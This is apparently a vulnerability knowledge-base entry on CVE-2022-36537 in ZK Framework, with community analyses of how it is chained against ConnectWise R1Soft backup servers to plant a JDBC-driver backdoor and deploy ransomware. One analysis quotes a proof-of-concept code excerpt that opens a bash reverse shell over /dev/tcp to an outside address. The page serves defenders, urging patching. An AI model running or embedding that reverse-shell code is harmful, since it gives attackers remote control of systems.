Very High
CVE-2022-36537
CVE-2022-36537
Description
ZK Framework v9.6.1, 9.6.0.1, 9.5.1.3, 9.0.1.2 and 8.6.4.1 allows attackers to access sensitive information via a crafted POST request sent to the component AuUploader.
Add Assessment
Technical Analysis
The core vuln here is an info leak in ZK Framework, which — yep, you guessed it! — is a popular open-source Java library used to create enterprise mobile and web apps. The original advisory, NVD entry, and CVSS score are all predicated on the mere info leak, but as it turns out, other popular software that uses ZK Framework is vulnerable to full-on remote code execution via CVE-2022-36537. Both Huntress and NCC Group have noted that this bug is being exploited in vulnerable ConnectWise R1Soft Server Backup Manager software to gain initial access to target systems and then do a variety of not-good things, including installing malicious JDBC database drivers to backdoor systems, deploying ransomware, and so on.
Per various write-ups and public PoCs analyzed by @sfewer-r7, the following seems to happen:
- Attacker uses the CVE-2022-36537 to leak the contents of
/Configuration/database-drivers.zul, which yields a unique secret ID value
- Armed with this value, attacker exploits vuln again to reach an endpoint that allows them to upload the JDBC driver, which functions as a handy backdoor
- Attacker can now use the REST API to issue commands to registered agents to do nefarious things, like, you know, deploy your ransomware of choice to downstream systems
- Oh and hey there are supply chain implications
We know the ConnectWise R1Soft vector is in active use and is easily exploitable, but this being a library vuln (so hot right now), that’s almost certainly not going to be the only attack vector. Some light recon done by folks smarter than me (namely the aforementioned @sfewer-r7) indicates there are plenty of other things that use ZK Framework. The question is which are vulnerable to remote exploits out of the box. Knocking this down an exploitability point overall simply because other applications may not be quite as easily exploitable remotely as the ConnectWise software.
If you’re using a vulnerable R1Soft Server Backup Manager version, please patch immediately. The NCC Group’s FOX IT team has a great write-up with IOCs and attack details.
Technical Analysis
The “ZK” Framework is an open-source Java framework for building enterprise web and mobile applications. The R1Soft Server Backup Manager utilises. this framework.
By bypassing the authentication process, uploading a ‘custom and weaponized database driver (JDBC) that contains a payload for creating a remote shell on the device is possible. Excerpt from one of the public PoCs with a detail in the weaponized JDBC driver:
static { String winCmd = "dir"; String linuxCmd = "bash -i >& /dev/tcp/192.168.1.0/2022 0>&1"; String[] cmds = null; if (System.getProperty("os.name").toLowerCase().contains("win")) { cmds = new String[]{"cmd.exe", "/c", winCmd}; } else { cmds = new String[]{"/bin/bash", "-c", linuxCmd}; }
One of the Incident Response blogs in the referrals from Fox-IT mentions that activity since November 2022 has been observed where this software has been compromised and a backdoor is running on these systems.
CVSS V3 Severity and Metrics
General Information
Vendors
- zkoss
Products
- zk framework
Exploited in the Wild
References
Exploit
A PoC added here by the AKB Worker must have at least 2 GitHub stars.
